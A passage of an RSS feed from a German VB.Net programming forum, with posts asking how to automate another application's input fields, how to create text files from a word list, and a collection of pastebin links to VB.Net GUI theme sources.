Da ich aber ewig nix mit VB gemacht habe und Google mir keine Antwort geben konnte (oder ich falsch gesucht habe) wollte ich nun die Programmierer unter euch fragen ob ich mittels VB Inputfelder fremder Applikationen (in VB gecodet, nur die .exe vorhanden) betätigen und Richtextboxen (Log) auslesen kann.<br />
Falls ja wüsste ich gerne wie ich das anstellen kann und ob das ohne weiteres machbar ist.<br />
Falls nicht wäre ich über Vorschläge wie ich das anders realisieren könnte erfreut.<br />
<br />
MfG bluedra</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>bluedraqon</dc:creator>
			<guid isPermaLink="true">net-94/mittels-vb-fremde-applikationen-steuern-18083</guid>
		</item>
		<item>
			<title>VB.Net Suche jemanden der mir was codet</title>
			<link>net-94/suche-jemanden-der-mir-was-codet-17942?goto=newpost</link>
			<pubDate>Sat, 10 Nov 2012 09:52:58 GMT</pubDate>
			<description>Hey. 
 
Ich suche jemanden der mir ein Programm erstellen kann wo ich in eine Box mehrere Wörter eintrage z.B.: 
Wort 1 
Wort 2 
Wort 3 
 
Danach...</description>
			<content:encoded><![CDATA[<div>Hey.<br />
<br />
Ich suche jemanden der mir ein Programm erstellen kann wo ich in eine Box mehrere Wörter eintrage z.B.:<br />
Wort 1<br />
Wort 2<br />
Wort 3<br />
<br />
Danach sollen 3 Textdateien mit den Namen erstellt werden. Ist das irgendwie möglich über ein Programm<br />
Textdateien erstellen zu lassen?<br />
<br />
MfG.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/suche-jemanden-der-mir-was-codet-17942</guid>
		</item>
		<item>
			<title>VB.Net Themes (Purecode) 2.0</title>
			<link>net-94/themes-purecode-2-0-17709?goto=newpost</link>
			<pubDate>Thu, 01 Nov 2012 22:57:03 GMT</pubDate>
			<description>ALLE THEMES FINDET IHR AUCH IN http://u-hacks.net/net-94/biesis-vbulletin-net-theme-archive-19066/#post165873 
 
Hallo Leute, 
 
da IToxic nicht mehr...</description>
			<content:encoded><![CDATA[<div>ALLE THEMES FINDET IHR AUCH IN <a href="http://u-hacks.net/net-94/biesis-vbulletin-net-theme-archive-19066/#post165873" target="_blank" rel="nofollow">http://u-hacks.net/net-94/biesis-vbu...66/#post165873</a><br />
<br />
Hallo Leute,<br />
<br />
da IToxic nicht mehr in seinem Thread antwortet und Aktualisiert, eröffne ich mal selbst ein Thread.<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Zitat:</div>
	<div class="bbcode_quote printable">
		<hr />
		
			<div>
				Zitat von <strong>IToxic</strong>
				
			</div>
			<div class="message"> <img src="http://u-hacks.net/images/uhacks/smilies/icon2.gif" border="0" alt="" /><b>Vorwort</b><br />
Nachdem ich für einen User ein Design rausgesucht habe, bin auch auf mehr Designs gestoßen, die ich euch nicht vorenthalten möchte .<br />
<br />
Keins der unten aufgeführten Designs wurde von mir erstellt, der jeweilige Ersteller steht im Source .<br />
<br />
Ein großes Danekschön geht an Aeonhack, der die Grundlage(Base) für die ganzen Designs entwickelt und geschrieben hat!<br />
<br />
Um an den Source des jeweiligen Themes zu gelangen, müsst ihr nur auf das Bild klicken und schon werdet ihr zum Sourcecode weitergeleitet.<br />
<br />
<img src="http://u-hacks.net/images/uhacks/smilies/icon2.gif" border="0" alt="" /><b>Verwendung</b><br />
Ihr erstellt eine neue Klasse, welchen Namen diese hat spielt keine Rolle.<br />
Danach kopiert ihr den Source vom gewünschten Desing und fügt diesen ein. Wenn ihr dies getan habt, speichert ihr euer Projekt und erstellt es. Zu guter letzt debuggt ihr das Projekt einmal und siehe da, in der Toolbox haben finden sich nun die neuen Controls, die ihr wie gewohnt per Drag&amp;Drop plazieren könnt.<br />
<br />
<font color="#FF0000"><font size="4"><b>CREDITS NICHT VERGESSEN</b>!</font></font></div>
			
		<hr />
	</div>
</div>Folgende Themes kann ich euch z.Z. anbieten:<br />
<br />
<a href="http://pastebin.com/DM7DDsAk" target="_blank" rel="nofollow"><img src="https://u-labs.de/forum/attachment.php?attachmentid=666&amp;d=1379876222" border="0" alt="Name:  hstyjsyjkyk.jpg
Hits: 324
Größe:  43,8 KB" class="thumbnail" style="float:CONFIG" /></a><br />
<br />
<a href="http://pastebin.com/DM7DDsAk" target="_blank" rel="nofollow">Link zum Code (Fals Bild nicht klickbar ist)</a><br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Modern, Pearl, and Electron Themes</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=677&amp;d=1379876232" border="0" alt="Name:  modern-640c3ad339.png
Hits: 287
Größe:  7,5 KB" class="thumbnail" style="float:CONFIG" /><br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=678&amp;d=1379876232" border="0" alt="Name:  pearl-2ff6473f56.png
Hits: 253
Größe:  5,4 KB" class="thumbnail" style="float:CONFIG" /><br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=671&amp;d=1379876232" border="0" alt="Name:  electro-bdf35d9c41.png
Hits: 260
Größe:  4,4 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/v2PAVpCL" target="_blank" rel="nofollow">Pastebin1</a><br />
<br />
<a href="http://pastebin.com/C86eVgUa" target="_blank" rel="nofollow">Pastebin</a><br />

</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Visual Studio Theme</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=687&amp;d=1379876232" border="0" alt="Name:  vn66y-7d2d592025.png
Hits: 273
Größe:  39,0 KB" class="thumbnail" style="float:CONFIG" /><br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/LhwCNNqf" target="_blank" rel="nofollow">Pastebin</a><br />

</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Future Theme</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=674&amp;d=1379876232" border="0" alt="Name:  future-1986462721.png
Hits: 261
Größe:  5,1 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/U2ZRYBP1" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Bullion Theme</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=670&amp;d=1379876222" border="0" alt="Name:  bullion-5be47d616.png
Hits: 263
Größe:  5,3 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/xzSE5j0V" target="_blank" rel="nofollow">Pastebin</a><br />

</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Fusion Theme</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=673&amp;d=1379876232" border="0" alt="Name:  fusion-f6afe31c37.png
Hits: 259
Größe:  5,3 KB" class="thumbnail" style="float:CONFIG" /><br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/iy31jRPQ" target="_blank" rel="nofollow">Pastebin</a><br />

</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Genuine Theme</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=675&amp;d=1379876232" border="0" alt="Name:  genuine-4288450a27.png
Hits: 252
Größe:  4,2 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/wTk8vNG9" target="_blank" rel="nofollow">Pastebin</a><br />

</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Adobe Thème</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=669&amp;d=1379876222" border="0" alt="Name:  a342caeraw-6a08b66016.png
Hits: 255
Größe:  38,5 KB" class="thumbnail" style="float:CONFIG" /><br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/sje56MHh" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Advantium</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=692&amp;d=1379876232" border="0" alt="Name:  zm4fch-552a5ff061.png
Hits: 268
Größe:  12,2 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/SzBZW7Yc" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Alpha</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=672&amp;d=1379876232" border="0" alt="Name:  form1-7ce355ba53.png
Hits: 253
Größe:  951 Bytes" class="thumbnail" style="float:CONFIG" /><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/fd05zfcQ" target="_blank" rel="nofollow">Pastebin</a><br />

</div>
</div>
</div><br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Beyon Thème</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=667&amp;d=1379876222" border="0" alt="Name:  1-d904d9b513.png
Hits: 246
Größe:  2,8 KB" class="thumbnail" style="float:CONFIG" /><br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/mD9qVMSe" target="_blank" rel="nofollow">Pastebin</a><br />

</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>CypherxTheme</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=679&amp;d=1379876232" border="0" alt="Name:  qqkr6-4797a8ef60.png
Hits: 262
Größe:  8,8 KB" class="thumbnail" style="float:CONFIG" /><br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/Q296MX6E" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Électrique Thème</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=668&amp;d=1379876222" border="0" alt="Name:  9zurb-9256901c5.png
Hits: 263
Größe:  18,3 KB" class="thumbnail" style="float:CONFIG" /><br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/FzNwdmzf" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Alec Thème</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<br />
Bild Folgt.<br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/PBJFyjSq" target="_blank" rel="nofollow">Pastebin</a><br />

</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>InnerDarkness Thème</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=688&amp;d=1379876232" border="0" alt="Name:  vstheme-26a32d2857.png
Hits: 260
Größe:  11,2 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/n0inNiP1" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Thème Morph</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=676&amp;d=1379876232" border="0" alt="Name:  kkkkkk-1537051625.png
Hits: 243
Größe:  3,1 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/5XyCrENi" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Purityx thème</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=681&amp;d=1379876232" border="0" alt="Name:  situationtheme-03246e9496.png
Hits: 243
Größe:  6,2 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/61UELnAr" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Rockstar thème</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=682&amp;d=1379876232" border="0" alt="Name:  ss20110711_171007-39fa6e8740.png
Hits: 252
Größe:  6,9 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/awij8Vrd" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Secure thème</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=680&amp;d=1379876232" border="0" alt="Name:  securetheme-32c0d8126.png
Hits: 257
Größe:  8,4 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/y33YTCpw" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Storm thème</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=684&amp;d=1379876232" border="0" alt="Name:  stheme1-ca778a9159.png
Hits: 243
Größe:  3,6 KB" class="thumbnail" style="float:CONFIG" /><br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/HpxW3p7B" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Situation thème</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<a style="font-weight:bold;text-decoration:none;" target="blank" href="http://s3.noelshack.com/old/up/situationtheme-03246e9496.png"><img  style="vertical-align:text-bottom;" src="https://u-img.net/img/2542Da.png"> BILD ANZEIGEN </a> <a style="font-size:10px;text-decoration:none;" href="http://u-hacks.net/news-und-ankuendigungen-4/erlaubte-imagehoster-17046/" target="blank"> [Warum wird das Bild nicht angezeigt?]</a><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/HWv3vP8Q" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Simply grey thème</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=686&amp;d=1379876232" border="0" alt="Name:  teamviewer-ce453d264.png
Hits: 251
Größe:  24,8 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/WEBQY4BC" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Team Viewer thème</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=685&amp;d=1379876232" border="0" alt="Name:  stormalt-c1424f5b0.png
Hits: 252
Größe:  39,8 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/iWAZvT03" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Petit vert thème</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<a style="font-weight:bold;text-decoration:none;" target="blank" href="http://s3.noelshack.com/old/up/zlvga-10f3064f99.png"><img  style="vertical-align:text-bottom;" src="https://u-img.net/img/2542Da.png"> BILD ANZEIGEN </a> <a style="font-size:10px;text-decoration:none;" href="http://u-hacks.net/news-und-ankuendigungen-4/erlaubte-imagehoster-17046/" target="blank"> [Warum wird das Bild nicht angezeigt?]</a><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/3kfPCb1D" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<br />
